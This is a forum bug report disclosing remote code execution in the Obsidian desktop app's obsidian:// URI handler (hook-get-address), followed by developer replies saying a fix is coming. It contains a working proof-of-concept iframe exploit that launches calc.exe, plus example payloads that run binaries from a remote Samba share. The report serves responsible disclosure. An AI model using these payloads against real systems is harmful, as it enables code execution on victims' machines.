Possible remote code execution through obsidian:// URI scheme

Steps to reproduce

  1. Create a html file with iframe tag, then serves it on HTTP server.
<!-- exploit.html -->
<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <iframe src="obsidian://hook-get-address?x-success=file:///c:/windows/system32/calc.exe%00"></iframe>
  1. Open the html file in the browser. Modern web browser may popup a window to confirm to open Obsidian.exe, if we choose “Open Obsidian”, the command will be executed and popup a calc.exe.


  • Operating system:
    Tested on Windows client latest version 0.14.15.

Additional information

When Obsidian receive hook-get-address action, it will use window.open to open any provided uri without validation, attacker can use remote samba server to execute any binary (e.g. x-success=\\samba server\shares\shellcode.exe, x-success=file://samba server/shares/rce.jar) or other protocol like sftp://.

CVSS v3.1 Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE Types: CWE-20 Improper Input Validation


Thanks, we’ll look into this shortly.

will be handled better in 0.15.5.

Thanks for quick resolution, can we request a CVE ID for this issue?

This topic was automatically closed 7 days after the last reply. New replies are no longer allowed.